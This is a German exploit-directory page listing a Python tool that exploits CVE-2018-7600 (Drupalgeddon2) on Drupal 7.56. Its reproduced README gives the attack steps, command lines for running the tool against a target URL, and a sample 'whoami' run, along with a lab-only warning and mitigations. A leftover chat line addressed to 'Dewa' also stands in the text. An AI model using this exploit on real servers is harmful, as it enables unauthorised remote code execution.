Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-7600 — Python-Programm zur Durchführung von RCE auf Drupal Version 7.56 | Kitploit
Tools/GitHubGitHub/xxxtectationxxx/cve-2018-7600
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubxxxtectationxxx/cve-2018-7600

CVE-2018-7600

Python-Programm zur Durchführung von RCE auf Drupal Version 7.56

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Bereit, Dewa, ich habe auch den Abschnitt zur Verwendung ab git clone hinzugefügt, damit die README vollständig ist.
Dies ist die endgültige Version, die du nur noch in README.md in deinem GitHub-Repo kopieren und einfügen musst.

CVE-2018-7600 - Drupalgeddon2 RCE Exploit

Dieser Exploit nutzt eine Schwachstelle in Drupal 7.56 (und einigen früheren Versionen) aus, die unter dem Namen Drupalgeddon2 bekannt ist.
Diese Schwachstelle ermöglicht Remote Code Execution (RCE) ohne Authentifizierung, indem sie eine Lücke in einem verwundbaren Formular ausnutzt.

🔗 Repository: https://github.com/xxxTectationxxx/CVE-2018-7600


⚠️ Warnung

Dieses Skript dient nur zu Lernzwecken und für Tests in einer Laborumgebung.
Es ist verboten, es auf Systemen zu verwenden, für die keine offizielle Testgenehmigung vorliegt.


🎯 Zielversionen

  • Drupal 7.x (einschließlich 7.56), das noch nicht gepatcht ist.
  • Möglicherweise funktioniert es auch mit einigen frühen Versionen von Drupal 8.

📜 Kurze Funktionsweise

  1. Senden eines Payloads an den Endpunkt user/password mit einem Parameter, der die Funktion passthru() in PHP auslöst.
  2. Extrahieren der form_build_id aus der Serverantwort.
  3. Senden einer zweiten Anfrage, um den gewünschten Befehl auszuführen.

📦 Installation & Verwendung

Repository klonen:

root@kitploit:~
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600

Abhängigkeiten installieren:

root@kitploit:~
pip install requests

Exploit ausführen:

root@kitploit:~
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"

Beispiel:

root@kitploit:~
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"

💻 Beispielausgabe

root@kitploit:~
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data

🛡️ Gegenmaßnahmen

  • Aktualisiere Drupal auf die neueste Version.
  • Wende die offiziellen Sicherheits-Patches von Drupal an.
  • Beschränke den Zugriff auf den Server während der Behebung.

📚 Referenzen

  • Drupal Security Advisory SA-CORE-2018-002
  • Exploit-DB Entry #44449

Haftungsausschluss: Der Autor übernimmt keine Verantwortung für den Missbrauch dieses Skripts. Verwende es mit Bedacht und nur auf Systemen, die für Tests freigegeben sind.

Tool herunterladen